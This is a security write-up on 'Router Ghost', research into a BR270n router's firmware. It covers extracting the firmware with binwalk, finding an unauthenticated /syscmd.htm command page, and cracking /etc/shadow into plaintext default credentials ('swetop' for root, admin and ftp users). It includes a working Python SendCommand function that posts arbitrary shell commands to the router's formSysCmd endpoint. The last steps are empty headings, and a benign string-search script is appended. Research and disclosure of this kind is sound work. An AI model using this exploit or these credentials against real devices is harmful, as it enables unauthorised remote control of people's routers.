Router Ghost - A possibility of 0day remote analysis & discovery
I discovered an IoT device's vulnerability.
- https://gitlab.com/4r70f74r9371n9/routerghost
This is a proof of concept of remote analysis without buying any device, and of the router exploit.
This is what I did:
1. Extract the firmware (BR270n_SA_FW_TC_1040.bin) with binwalk.
2. Write a tool to enumerate file paths and the strings in file contents.

3. I found a sensitive path:
python ./find.py | grep cmd

./squashfs-root/web/syscmd.htm

or a sensitive string in the HTTP server binary:
python ./find.py | grep -i cmd

./squashfs-root/bin/boa: /syscmd.htm

4. Browse to this page in a browser.

Authentication bypassed & remote shell execution!!
5. And I found etc/shadow:

6. Crack it with john:

root/swetop
ftp/swetop
ftpuser/swetop
admin/swetop
7. I found the ftp keyword, and then found the matching binary in the router:
# ls -al /bin | grep ftp
-rwxr-xr-x 1 root root 175060 Oct 28 2014 pure-ftpd
8. I found telnet in the binary directory (/bin) via the web interface:
ls -al /bin | grep telnet
lrwxrwxrwx 1 root root 7 Oct 28 2014 telnetd -> busybox
9. By analysing the router web interface:
<form action=/boafrm/formSysCmd method=POST name="formSysCmd">
<input type="text" name="sysCmd" value="" size="20" maxlength="500"></td>
<input type="submit" value="Apply" name="apply" onClick='return saveClick()'></td>
<input type="hidden" value="/syscmd.htm" name="submit-url">
10. I can set up the POST arguments as:
datas = {'apply':'Apply', 'msg':'', 'submit-url':'/syscmd.htm', 'sysCmd':cmd}
Write a function:
import requests
from bs4 import BeautifulSoup

def SendCommand(ip, cmd):
    # same fields as the syscmd.htm form, with the command in sysCmd
    datas = {'apply':'Apply', 'msg':'', 'submit-url':'/syscmd.htm', 'sysCmd':cmd}
    r = requests.post("http://%s/boafrm/formSysCmd" % ip, data=datas)
    # the command output comes back inside the page's <textarea>
    soup = BeautifulSoup(r.text, 'lxml') # windows encoding solution: https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/3259271
    data = soup.find('textarea')
    return data.text.encode('utf-8', 'ignore')
11. Toolchain analysis:
12. Write your C file.
13. Remote code execution exploit.
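The enumeration tool from step 2, written here as an added example (it is not the find.py from the Router Ghost repository): it walks a binwalk-extracted squashfs-root and reports every path and every printable content string that matches a pattern, in the same "path: string" form as the grep output above. The directory and byte contents in build_sample_root are constructed for the demo so the script runs offline.

```python
import os
import re
import tempfile

# Printable ASCII runs of at least 4 bytes, the same default as strings(1).
STRING_RE = re.compile(rb'[\x20-\x7e]{4,}')

def content_strings(path):
    """Yield printable strings from a file, whether an .htm page or an ELF binary."""
    with open(path, 'rb') as f:
        data = f.read()
    for m in STRING_RE.finditer(data):
        yield m.group().decode('ascii')

def find(root, pattern):
    """Return 'path' when the path matches and 'path: string' when a content string
    matches; case-insensitive, and symlinks (telnetd -> busybox) are skipped."""
    rx = re.compile(pattern, re.IGNORECASE)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic output order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            if rx.search(full):
                hits.append(full)
            try:
                hits.extend('%s: %s' % (full, s)
                            for s in content_strings(full) if rx.search(s))
            except OSError:  # device nodes, unreadable files
                continue
    return hits

def build_sample_root():
    """Constructed stand-in for a binwalk-extracted tree; not real firmware."""
    root = os.path.join(tempfile.mkdtemp(), 'squashfs-root')
    os.makedirs(os.path.join(root, 'web'))
    os.makedirs(os.path.join(root, 'bin'))
    with open(os.path.join(root, 'web', 'syscmd.htm'), 'w') as f:
        f.write('<form action=/boafrm/formSysCmd method=POST>\n')
    with open(os.path.join(root, 'web', 'index.htm'), 'w') as f:
        f.write('<html>home</html>\n')
    with open(os.path.join(root, 'bin', 'boa'), 'wb') as f:  # fake binary blob
        f.write(b'\x7fELF\x01\x00\x00/syscmd.htm\x00\x00/index.htm\x00')
    return root

if __name__ == '__main__':
    for line in find(build_sample_root(), 'cmd'):
        print(line)
```

Against a real extraction, replace build_sample_root() with the path of the squashfs-root directory and pipe the output through grep as in step 3.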